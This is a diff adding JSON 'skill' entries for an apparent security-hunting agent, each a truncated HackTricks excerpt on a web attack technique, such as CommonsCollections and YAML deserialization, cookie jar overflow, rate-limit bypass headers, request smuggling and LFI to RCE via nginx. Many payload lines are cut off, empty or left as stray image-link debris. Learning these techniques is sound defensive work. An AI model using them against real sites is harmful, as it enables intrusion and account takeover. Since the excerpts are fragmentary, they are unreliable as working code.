+ "A **same-origin** policy mandates that a **server requesting** a resource and the server hosting the **resource** share the same protocol (e.g., `http://`), domain name (e.g., `internal-web.com`), and **port** (e.g., 80). Under this policy, only web pages from the same domain and port are allowed access to the resources.",
+ "The application of the same-origin policy in the context of `http://normal-website.com/example/example.html` is illustrated as follows:",
+ "| URL accessed | Access permitted? |",
+ "| ----------------------------------------- | --------------------------------------- |",
+ "| `http://normal-website.com/example/` | Yes: Identical scheme, domain, and port |",
+ "| `http://normal-website.com/example2/` | Yes: Identical scheme, domain, and port |",
+ "| `https://normal-website.com/example/` | No: Different scheme and port |",
+ "| `http://en.normal-website.com/example/` | No: Different domain |",
+ "| `http://www.normal-website.com/example/` | No: Different domain |",
+ "| `http://normal-website.com:8080/example/` | No: Different port\\* |",
+ "\\*Internet Explorer disregards the port number in enforcing the same-origin policy, thus allowing this access."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/cors-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_7904e82aaad2.json b/skills/pentesting_web_7904e82aaad2.json
new file mode 100644
index 0000000..f094d5f
--- /dev/null
+++ b/skills/pentesting_web_7904e82aaad2.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_7904e82aaad2",
+ "category": "pentesting-web",
+ "title": "some same origin method execution",
+ "description": "# SOME - Same Origin Method Execution\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Same Origin Method Execution\n\nThere will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](#javascript-function).\n\nIn those case, one of the best things that you could do is to **access the DOM to call whatever** sensitive action you can find in there (like clicking a button). However, usually ",
+ "payloads": [
+ "# SOME - Same Origin Method Execution",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Same Origin Method Execution",
+ "There will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](#javascript-function).",
+ "In those case, one of the best things that you could do is to **access the DOM to call whatever** sensitive action you can find in there (like clicking a button). However, usually you will find this vulnerability in **small endpoints without any interesting thing in the DOM**.",
+ "In those scenarios, this attack will be very useful, because its goal is to be able to **abuse the limited JS execution inside a DOM from a different page from the same domain** with much interesting actions.",
+ "Basically, the attack flow is the following:",
+ "- Find a **callback that you can abuse** (potentially limited to \\[\\w\\\\.\\_]).",
+ "- If it's not limited and you can execute any JS, you could just abuse this as a regular XSS",
+ "- Make the **victim open a page** controlled by the **attacker**",
+ "- The **page will open itself** in a **different window** (the new window will have the object **`opener`** referencing the initial one)",
+ "- The **initial page** will load the **page** where the **interesting DOM** is located.",
+ "- The **second page** will load the **vulnerable page abusing the callback** and using the **`opener`** object to **access and execute some action in the initial page** (which now contains the interesting DOM).",
+ "> [!CAUTION]",
+ "> Note that even if the initial page access to a new URL after having created the second page, the **`opener` object of the second page is still a valid reference to the first page in the new DOM**."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_7a118772c7e7.json b/skills/pentesting_web_7a118772c7e7.json
new file mode 100644
index 0000000..bc6817f
--- /dev/null
+++ b/skills/pentesting_web_7a118772c7e7.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_7a118772c7e7",
+ "category": "pentesting-web",
+ "title": "java transformers to rutime exec payload",
+ "description": "# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Java Transformers to Rutime exec()\n\nIn several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:\n\n```java\nimport org.apache.commons.*;\nimport org.apache.commons.collections.*;\nimport org.apache.commons.collections.functors.*;\nimport org.apache.commons.collections.map.*;\nimport java.",
+ "payloads": [
+ "# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Java Transformers to Rutime exec()",
+ "In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:",
+ "```java",
+ "import org.apache.commons.*;",
+ "import org.apache.commons.collections.*;",
+ "import org.apache.commons.collections.functors.*;",
+ "import org.apache.commons.collections.map.*;",
+ "import java.io.*;",
+ "import java.lang.reflect.InvocationTargetException;",
+ "import java.util.Map;",
+ "import java.util.HashMap;",
+ "public class CommonsCollections1PayloadOnly {",
+ "public static void main(String... args) {"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_7c98f3d784a1.json b/skills/pentesting_web_7c98f3d784a1.json
new file mode 100644
index 0000000..0739773
--- /dev/null
+++ b/skills/pentesting_web_7c98f3d784a1.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_7c98f3d784a1",
+ "category": "pentesting-web",
+ "title": "cookie jar overflow",
+ "description": "# Cookie Jar Overflow\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThe browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:\n\n```javascript\n// Set many cookies\nfor (let i = 0; i < 700; i++) {\n document.cookie = `cookie${i}=${i}; Secure`\n}\n\n// Remove all cookies\nfor (let i = 0; i < 700; i++) {\n document.cookie = `coo",
+ "payloads": [
+ "# Cookie Jar Overflow",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:",
+ "```javascript",
+ "// Set many cookies",
+ "for (let i = 0; i < 700; i++) {",
+ "document.cookie = `cookie${i}=${i}; Secure`",
+ "// Remove all cookies",
+ "for (let i = 0; i < 700; i++) {",
+ "document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`",
+ "Notice, that third party cookies pointing to a different domain won't be overwritten.",
+ "> [!CAUTION]",
+ "> This attack can also be used to **overwrite HttpOnly cookies as you can delete it and then reset it with the value you want**.",
+ "> Check this in [**this post with a lab**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_7e5fac61da4c.json b/skills/pentesting_web_7e5fac61da4c.json
new file mode 100644
index 0000000..35dea1f
--- /dev/null
+++ b/skills/pentesting_web_7e5fac61da4c.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_7e5fac61da4c",
+ "category": "pentesting-web",
+ "title": "iframes in xss and csp",
+ "description": "# Iframes in XSS, CSP and SOP\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Iframes in XSS\n\nThere are 3 ways to indicate the content of an iframed page:\n\n- Via `src` indicating an URL (the URL may be cross origin or same origin)\n- Via `src` indicating the content using the `data:` protocol\n- Via `srcdoc` indicating the content\n\n**Accesing Parent & Child vars**\n\n```html\n\n \n\n ",
+ ""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_853af2d8f5bc.json b/skills/pentesting_web_853af2d8f5bc.json
new file mode 100644
index 0000000..de63e9a
--- /dev/null
+++ b/skills/pentesting_web_853af2d8f5bc.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_853af2d8f5bc",
+ "category": "pentesting-web",
+ "title": "rate limit bypass",
+ "description": "# Rate Limit Bypass\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Rate limit bypass techniques\n\n### Exploring Similar Endpoints\n\nAttempts should be made to perform brute force attacks on variations of the targeted endpoint, such as `/api/v3/sign-up`, including alternatives like `/Sing-up`, `/SignUp`, `/singup`, `/api/v1/sign-up`, `/api/sign-up` etc.\n\n### Incorporating Blank Characters in Code or Parameters\n\nInserting blank bytes like `%00`, `%0d%0a`, `%0d`, `%0a`, `%09`, `%0C`, `%20` into ",
+ "payloads": [
+ "# Rate Limit Bypass",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Rate limit bypass techniques",
+ "### Exploring Similar Endpoints",
+ "Attempts should be made to perform brute force attacks on variations of the targeted endpoint, such as `/api/v3/sign-up`, including alternatives like `/Sing-up`, `/SignUp`, `/singup`, `/api/v1/sign-up`, `/api/sign-up` etc.",
+ "### Incorporating Blank Characters in Code or Parameters",
+ "Inserting blank bytes like `%00`, `%0d%0a`, `%0d`, `%0a`, `%09`, `%0C`, `%20` into code or parameters can be a useful strategy. For example, adjusting a parameter to `code=1234%0a` allows for extending attempts through variations in input, like adding newline characters to an email address to get around attempt limitations.",
+ "### Manipulating IP Origin via Headers",
+ "Modifying headers to alter the perceived IP origin can help evade IP-based rate limiting. Headers such as `X-Originating-IP`, `X-Forwarded-For`, `X-Remote-IP`, `X-Remote-Addr`, `X-Client-IP`, `X-Host`, `X-Forwared-Host`, including using multiple instances of `X-Forwarded-For`, can be adjusted to simulate requests from different IPs.",
+ "```bash",
+ "X-Originating-IP: 127.0.0.1",
+ "X-Forwarded-For: 127.0.0.1",
+ "X-Remote-IP: 127.0.0.1",
+ "X-Remote-Addr: 127.0.0.1",
+ "X-Client-IP: 127.0.0.1"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/rate-limit-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_8547120b4b82.json b/skills/pentesting_web_8547120b4b82.json
new file mode 100644
index 0000000..ae03aac
--- /dev/null
+++ b/skills/pentesting_web_8547120b4b82.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_8547120b4b82",
+ "category": "pentesting-web",
+ "title": "basic .net deserialization objectdataprovider gadgets expandedwrapper and json.net",
+ "description": "# Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis post is dedicated to **understand how the gadget ObjectDataProvider is exploited** to obtain RCE and **how** the Serialization libraries **Json.Net and xmlSerializer can be abused** with that gadget.\n\n## ObjectDataProvider Gadget\n\nFrom the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\\\nYe",
+ "payloads": [
+ "# Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This post is dedicated to **understand how the gadget ObjectDataProvider is exploited** to obtain RCE and **how** the Serialization libraries **Json.Net and xmlSerializer can be abused** with that gadget.",
+ "## ObjectDataProvider Gadget",
+ "From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\\",
+ "Yeah, it's a weird explanation, so lets see what does this class have that is so interesting: This class allows to **wrap an arbitrary object**, use _**MethodParameters**_ to **set arbitrary parameters,** and then **use MethodName to call an arbitrary function** of the arbitrary object declared using the arbitrary parameters.\\",
+ "Therefore, the arbitrary **object** will **execute** a **function** with **parameters while being deserialized.**",
+ "### **How is this possible**",
+ "The **System.Windows.Data** namespace, found within the **PresentationFramework.dll** at `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF`, is where the ObjectDataProvider is defined and implemented.",
+ "Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**",
+ ".png>)",
+ "As you can observe when `MethodName` is set `base.Refresh()` is called, lets take a look to what does it do:",
+ ".png>)",
+ "Ok, lets continue seeing what does `this.BeginQuery()` does. `BeginQuery` is overridden by `ObjectDataProvider` and this is what it does:",
+ ".png>)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_88b27c48cbe7.json b/skills/pentesting_web_88b27c48cbe7.json
new file mode 100644
index 0000000..99e5248
--- /dev/null
+++ b/skills/pentesting_web_88b27c48cbe7.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_88b27c48cbe7",
+ "category": "pentesting-web",
+ "title": "python yaml deserialization",
+ "description": "# Python Yaml Deserialization\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Yaml **Deserialization**\n\n**Yaml** python libraries is also capable to **serialize python objects** and not just raw data:\n\n```\nprint(yaml.dump(str(\"lol\")))\nlol\n...\n\nprint(yaml.dump(tuple(\"lol\")))\n!!python/tuple\n- l\n- o\n- l\n\nprint(yaml.dump(range(1,10)))\n!!python/object/apply:builtins.range\n- 1\n- 10\n- 1\n```\n\nCheck how the **tuple** isn\u2019t a raw type of data and therefore it was **serialized**. And the same happen",
+ "payloads": [
+ "# Python Yaml Deserialization",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Yaml **Deserialization**",
+ "**Yaml** python libraries is also capable to **serialize python objects** and not just raw data:",
+ "print(yaml.dump(str(\"lol\")))",
+ "print(yaml.dump(tuple(\"lol\")))",
+ "!!python/tuple",
+ "print(yaml.dump(range(1,10)))",
+ "!!python/object/apply:builtins.range",
+ "Check how the **tuple** isn\u2019t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).",
+ ".png>)",
+ "**safe_load()** or **safe_load_all()** uses SafeLoader and **don\u2019t support class object deserialization**. Class object deserialization example:",
+ "```python",
+ "import yaml",
+ "from yaml import UnsafeLoader, FullLoader, Loader"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/python-yaml-deserialization.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_89d1446fdc8d.json b/skills/pentesting_web_89d1446fdc8d.json
new file mode 100644
index 0000000..c16925c
--- /dev/null
+++ b/skills/pentesting_web_89d1446fdc8d.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_89d1446fdc8d",
+ "category": "pentesting-web",
+ "title": "xslt server side injection extensible stylesheet language transformations",
+ "description": "# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nXSLT is a technology employed for transforming XML documents into different formats. It comes in three versions: 1, 2, and 3, with version 1 being the most commonly utilized. The transformation process can be executed either on the server or within the browser.\n\nThe frameworks that are most frequently used include:\n\n- **Libxslt** from Gnome,\n- **Xal",
+ "payloads": [
+ "# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "XSLT is a technology employed for transforming XML documents into different formats. It comes in three versions: 1, 2, and 3, with version 1 being the most commonly utilized. The transformation process can be executed either on the server or within the browser.",
+ "The frameworks that are most frequently used include:",
+ "- **Libxslt** from Gnome,",
+ "- **Xalan** from Apache,",
+ "- **Saxon** from Saxonica.",
+ "For the exploitation of vulnerabilities associated with XSLT, it is necessary for xsl tags to be stored on the server side, followed by accessing that content. An illustration of such a vulnerability is documented in the following source: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).",
+ "## Example - Tutorial",
+ "```bash",
+ "sudo apt-get install default-jdk",
+ "sudo apt-get install libsaxonb-java libsaxon-java",
+ "```xml:xml.xml",
+ ""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_8a7f6b50c38e.json b/skills/pentesting_web_8a7f6b50c38e.json
new file mode 100644
index 0000000..15dfc0e
--- /dev/null
+++ b/skills/pentesting_web_8a7f6b50c38e.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_8a7f6b50c38e",
+ "category": "pentesting-web",
+ "title": "request smuggling in http 2 downgrades",
+ "description": "# Request Smuggling in HTTP/2 Downgrades\n\n{{#include ../../banners/hacktricks-training.md}}\n\nHTTP/2 is generally considered immune to classic request-smuggling because the length of each DATA frame is explicit. **That protection disappears as soon as a front-end proxy \u201cdowngrades\u201d the request to HTTP/1.x before forwarding it to a back-end**. The moment two different parsers (the HTTP/2 front-end and the HTTP/1 back-end) try to agree on where one request ends and the next begins, all the old desy",
+ "payloads": [
+ "# Request Smuggling in HTTP/2 Downgrades",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "HTTP/2 is generally considered immune to classic request-smuggling because the length of each DATA frame is explicit. **That protection disappears as soon as a front-end proxy \u201cdowngrades\u201d the request to HTTP/1.x before forwarding it to a back-end**. The moment two different parsers (the HTTP/2 front-end and the HTTP/1 back-end) try to agree on where one request ends and the next begins, all the old desync tricks come back \u2013 plus a few new ones.",
+ "## Why downgrades happen",
+ "1. Browsers already speak HTTP/2, but much legacy origin infrastructure still only understands HTTP/1.1.",
+ "2. Reverse-proxies (CDNs, WAFs, load-balancers) therefore terminate TLS + HTTP/2 at the edge and **rewrite every request as HTTP/1.1** for the origin.",
+ "3. The translation step has to create *both* `Content-Length` **and/or** `Transfer-Encoding: chunked` headers so that the origin can determine body length.",
+ "Whenever the front-end trusts the HTTP/2 frame length **but** the back-end trusts CL or TE, an attacker can force them to disagree.",
+ "## Two dominant primitive classes",
+ "| Variant | Front-end length | Back-end length | Typical payload |",
+ "|---------|-----------------|-----------------|-----------------|",
+ "| **H2.TE** | HTTP/2 frame | `Transfer-Encoding: chunked` | Embed an extra chunked message body whose final `0\\r\\n\\r\\n` is *not* sent, so the back-end waits for the attacker-supplied \u201cnext\u201d request. |",
+ "| **H2.CL** | HTTP/2 frame | `Content-Length` | Send a *smaller* CL than the real body, so the back-end reads past the boundary into the following request. |",
+ "> These are identical in spirit to classic TE.CL / CL.TE, just with HTTP/2 replacing one of the parsers.",
+ "## Identifying a downgrade chain"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_8c406847063c.json b/skills/pentesting_web_8c406847063c.json
new file mode 100644
index 0000000..7f6797b
--- /dev/null
+++ b/skills/pentesting_web_8c406847063c.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_8c406847063c",
+ "category": "pentesting-web",
+ "title": "browext permissions and host permissions",
+ "description": "# BrowExt - permissions & host_permissions\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n### **`permissions`**\n\nPermissions are defined in the extension's **`manifest.json`** file using the **`permissions`** property and allow access to almost anything a browser can access (Cookies or Physical Storage):\n\nThe previous manifest declares that the extension requires the `storage` permission. This means that it can use [the storage API](https://developer.mozilla.org/en-US/",
+ "payloads": [
+ "# BrowExt - permissions & host_permissions",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### **`permissions`**",
+ "Permissions are defined in the extension's **`manifest.json`** file using the **`permissions`** property and allow access to almost anything a browser can access (Cookies or Physical Storage):",
+ "The previous manifest declares that the extension requires the `storage` permission. This means that it can use [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) to store its data persistently. Unlike cookies or `localStorage` APIs which give users some level of control, **extension storage can normally only be cleared by uninstalling the extension**.",
+ "An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image:",
+ "",
+ "You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.**",
+ "### `host_permissions`",
+ "The optional but powerful setting **`host_permissions`** indicates with which hosts the extension is going to be able to interact via apis such as [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), and [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs).",
+ "The following `host_permissions` basically allow every web:",
+ "```json",
+ "\"host_permissions\": [",
+ "\"*://*/*\""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_8c9adb021df6.json b/skills/pentesting_web_8c9adb021df6.json
new file mode 100644
index 0000000..d463605
--- /dev/null
+++ b/skills/pentesting_web_8c9adb021df6.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_8c9adb021df6",
+ "category": "pentesting-web",
+ "title": "reset password",
+ "description": "# Reset/Forgotten Password Bypass\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Password Reset Token Leak Via Referrer**\n\n- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.\n- **Impact**: Potential account takeover via Cross-Site Request Forgery (CSRF) attacks.\n- **Exploitation**: To check if a password reset token is leaking in the referer header, **req",
+ "payloads": [
+ "# Reset/Forgotten Password Bypass",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Password Reset Token Leak Via Referrer**",
+ "- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.",
+ "- **Impact**: Potential account takeover via Cross-Site Request Forgery (CSRF) attacks.",
+ "- **Exploitation**: To check if a password reset token is leaking in the referer header, **request a password reset** to your email address and **click the reset link** provided. **Do not change your password** immediately. Instead, **navigate to a third-party website** (like Facebook or Twitter) while **intercepting the requests using Burp Suite**. Inspect the requests to see if the **referer header contains the password reset token**, as this could expose sensitive information to third parties.",
+ "- **References**:",
+ "- [HackerOne Report 342693](https://hackerone.com/reports/342693)",
+ "- [HackerOne Report 272379](https://hackerone.com/reports/272379)",
+ "- [Password Reset Token Leak Article](https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a)",
+ "## **Password Reset Poisoning**",
+ "- Attackers may manipulate the Host header during password reset requests to point the reset link to a malicious site.",
+ "- **Impact**: Leads to potential account takeover by leaking reset tokens to attackers.",
+ "- **Mitigation Steps**:",
+ "- Validate the Host header against a whitelist of allowed domains."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/reset-password.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_8e47c9552d8d.json b/skills/pentesting_web_8e47c9552d8d.json
new file mode 100644
index 0000000..63278aa
--- /dev/null
+++ b/skills/pentesting_web_8e47c9552d8d.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_8e47c9552d8d",
+ "category": "pentesting-web",
+ "title": "css injection code",
+ "description": "# CSS Injection Code\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n```html:victim.html\n\n\n
"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xs-search/css-injection/css-injection-code.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_90a24eed010e.json b/skills/pentesting_web_90a24eed010e.json
new file mode 100644
index 0000000..8069a1e
--- /dev/null
+++ b/skills/pentesting_web_90a24eed010e.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_90a24eed010e",
+ "category": "pentesting-web",
+ "title": "debugging client side js",
+ "description": "# Debugging Client Side JS\n\n{{#include ../../banners/hacktricks-training.md}}\n\nDebugging client side JS can be a pain because every-time you change the URL (including a change in the params used or param values) you need to **reset the breakpoint and reload the page**.\n\n### `debugger;`\n\nIf you place the line `debugger;` inside a JS file, when the **browser** executes the JS it will **stop** the **debugger** in that place. Therefore, one way to set constant breakpoints would be to **download all ",
+ "payloads": [
+ "# Debugging Client Side JS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Debugging client side JS can be a pain because every-time you change the URL (including a change in the params used or param values) you need to **reset the breakpoint and reload the page**.",
+ "### `debugger;`",
+ "If you place the line `debugger;` inside a JS file, when the **browser** executes the JS it will **stop** the **debugger** in that place. Therefore, one way to set constant breakpoints would be to **download all the files locally and change set breakpoints in the JS code**.",
+ "### Overrides",
+ "Browser overrides allows to have a local copy of the code that is going to be executed and execute that one instead of the one from the remote server.\\",
+ "You can **access the overrides** in \"Dev Tools\" --> \"Sources\" --> \"Overrides\".",
+ "You need to **create a local empty folder to be used to store the overrides**, so just create a new local folder and set is as override in that page.",
+ "Then, in \"Dev Tools\" --> \"Sources\" **select the file** you want to override and with **right click select \"Save for overrides\"**.",
+ ".png>)",
+ "This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:",
+ ".png>)",
+ "## References",
+ "- [https://www.youtube.com/watch?v=BW\\_-RCo9lo8\\&t=1529s](https://www.youtube.com/watch?v=BW_-RCo9lo8&t=1529s)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_94685f0b5a87.json b/skills/pentesting_web_94685f0b5a87.json
new file mode 100644
index 0000000..307a759
--- /dev/null
+++ b/skills/pentesting_web_94685f0b5a87.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_94685f0b5a87",
+ "category": "pentesting-web",
+ "title": "chrome cache to xss",
+ "description": "# Chrome Cache to XSS\n\n{{#include ../../banners/hacktricks-training.md}}\n\nMore in depth details [**in this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote).\n\nThe technique discussed here involves understanding the behavior and interaction of two primary cache types: the **back/forward cache (bfcache)** and the **disk cache**. The bfcache, which stores a complete snapshot of a page including the JavaScript heap, is prioritized over the disk cache for back/forward navigations ",
+ "payloads": [
+ "# Chrome Cache to XSS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "More in depth details [**in this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote).",
+ "The technique discussed here involves understanding the behavior and interaction of two primary cache types: the **back/forward cache (bfcache)** and the **disk cache**. The bfcache, which stores a complete snapshot of a page including the JavaScript heap, is prioritized over the disk cache for back/forward navigations due to its ability to store a more comprehensive snapshot. The disk cache, in contrast, stores resources fetched from the web without including the JavaScript heap, and is utilized for back/forward navigations to reduce communication costs. An interesting aspect of the disk cache is its inclusion of resources fetched using `fetch`, meaning accessed URL resources will be rendered by the browser from the cache.",
+ "### Key Points:",
+ "- The **bfcache** has precedence over the disk cache in back/forward navigations.",
+ "- To utilize a page stored in disk cache instead of bfcache, the latter must be disabled.",
+ "### Disabling bfcache:",
+ "By default, Puppeteer disables bfcache, aligning with conditions listed in Chromium's documentation. One effective method to disable bfcache is through the use of `RelatedActiveContentsExist`, achieved by opening a page with `window.open()` that retains a reference to `window.opener`.",
+ "### Reproducing the behavior:",
+ "1. Visit a webpage, e.g., `https://example.com`.",
+ "2. Execute `open(\"http://spanote.seccon.games:3000/api/token\")`, which results in a server response with a 500 status code.",
+ "3. In the newly opened tab, navigate to `http://spanote.seccon.games:3000/`. This action caches the response of `http://spanote.seccon.games:3000/api/token` as a disk cache.",
+ "4. Use `history.back()` to navigate back. The action results in the rendering of the cached JSON response on the page.",
+ "Verification that the disk cache was utilized can be confirmed through the use of DevTools in Google Chrome."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_94e2600def3f.json b/skills/pentesting_web_94e2600def3f.json
new file mode 100644
index 0000000..2ad9a09
--- /dev/null
+++ b/skills/pentesting_web_94e2600def3f.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_94e2600def3f",
+ "category": "pentesting-web",
+ "title": "lfi2rce via nginx temp files",
+ "description": "# LFI2RCE via Nginx temp files\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Vulnerable configuration\n\n[Example from bierbaumer.net](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) showed that even the following one-liner is enough when PHP runs behind an nginx reverse proxy that buffers request bodies to disk:\n\n```php\n/fd/`) can still execute the unlinked contents, giving you RCE through LFI.",
+ "## Why nginx temp files are abusable",
+ "* Request bodies that exceed the buffer threshold are flushed to `client_body_temp_path` (defaults to `/tmp/nginx/client-body` or `/var/lib/nginx/body`).",
+ "* The file name is random, but the file descriptor remains reachable under `/proc//fd/`. As long as the request body has not completed (or you keep the TCP stream hanging), nginx keeps the descriptor open even though the path entry is unlinked.",
+ "* PHP\u2019s include/require resolves those `/proc/.../fd/...` symlinks, so an attacker with LFI can hop through procfs to execute the buffered temp file even after nginx deletes it.",
